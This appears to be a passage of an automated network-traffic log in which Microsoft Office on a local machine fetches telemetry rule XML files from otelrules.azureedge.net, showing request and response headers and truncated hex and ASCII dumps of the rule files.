                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125024Z-r1cf579d778n9656hC1EWRqns000000000q0000000003wfg
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:25 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        118192.168.2.84984313.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:25 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:25 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:25 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1366
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                        ETag: "0x8DC582BEA414B16"
                                                                                                        x-ms-request-id: 22947e51-b01e-0021-7203-48cab7000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125025Z-r1cf579d778x776bhC1EWRdk8000000008c000000000632k
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:25 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        119192.168.2.84984413.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:25 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:25 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:25 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1399
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                        ETag: "0x8DC582BE1CC18CD"
                                                                                                        x-ms-request-id: 62be0662-301e-0020-193f-496299000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125025Z-r1cf579d7782v2q5hC1EWRt9bw000000032g00000000737e
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:25 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        120192.168.2.84984513.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:25 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:25 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:25 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1362
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                        ETag: "0x8DC582BEB256F43"
                                                                                                        x-ms-request-id: a681d1f9-301e-0020-1b07-486299000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125025Z-r1cf579d778lntp7hC1EWR9gg400000007vg0000000046rd
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:25 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        121192.168.2.84984613.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:26 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:27 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:26 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1403
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                        ETag: "0x8DC582BEB866CDB"
                                                                                                        x-ms-request-id: 145bb02d-e01e-0003-3277-490fa8000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125026Z-r1cf579d778lntp7hC1EWR9gg400000007sg0000000079tk
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:27 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        122192.168.2.84984713.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:26 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:27 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:27 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1366
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                        ETag: "0x8DC582BE5B7B174"
                                                                                                        x-ms-request-id: 7b8d486f-101e-0017-1506-4847c7000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125027Z-r1cf579d7786c2tshC1EWRr1gc00000007y0000000008agd
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:27 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        123192.168.2.84984813.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:27 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:27 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:27 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1399
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                        ETag: "0x8DC582BE976026E"
                                                                                                        x-ms-request-id: e1587d4e-001e-0046-7554-49da4b000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125027Z-r1cf579d778gg9hlhC1EWRh7nw00000000yg000000005y4z
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:27 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        124192.168.2.84984913.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:27 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:27 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:27 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1362
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                        ETag: "0x8DC582BDC13EFEF"
                                                                                                        x-ms-request-id: 061d09a2-c01e-00a1-3006-487e4a000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125027Z-r1cf579d7786c2tshC1EWRr1gc00000007x0000000008mwu
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:27 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        125192.168.2.84985013.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:27 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:27 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:27 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1425
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                        ETag: "0x8DC582BE6BD89A1"
                                                                                                        x-ms-request-id: 562ac663-901e-0029-652e-49274a000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125027Z-r1cf579d778mpnwnhC1EWRfgng000000024g0000000059rw
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:27 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        126192.168.2.84985213.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:29 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:29 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:29 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1415
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                        ETag: "0x8DC582BE7C66E85"
                                                                                                        x-ms-request-id: 2951358a-001e-0065-2ebc-490b73000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125029Z-r1cf579d778n9656hC1EWRqns000000000m0000000003xcn
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:29 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        127192.168.2.84985313.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:29 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:29 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:29 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1378
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                        ETag: "0x8DC582BDB813B3F"
                                                                                                        x-ms-request-id: af039603-701e-005c-3603-48bb94000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125029Z-r1cf579d778qlpkrhC1EWRpfc800000008z0000000008u82
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
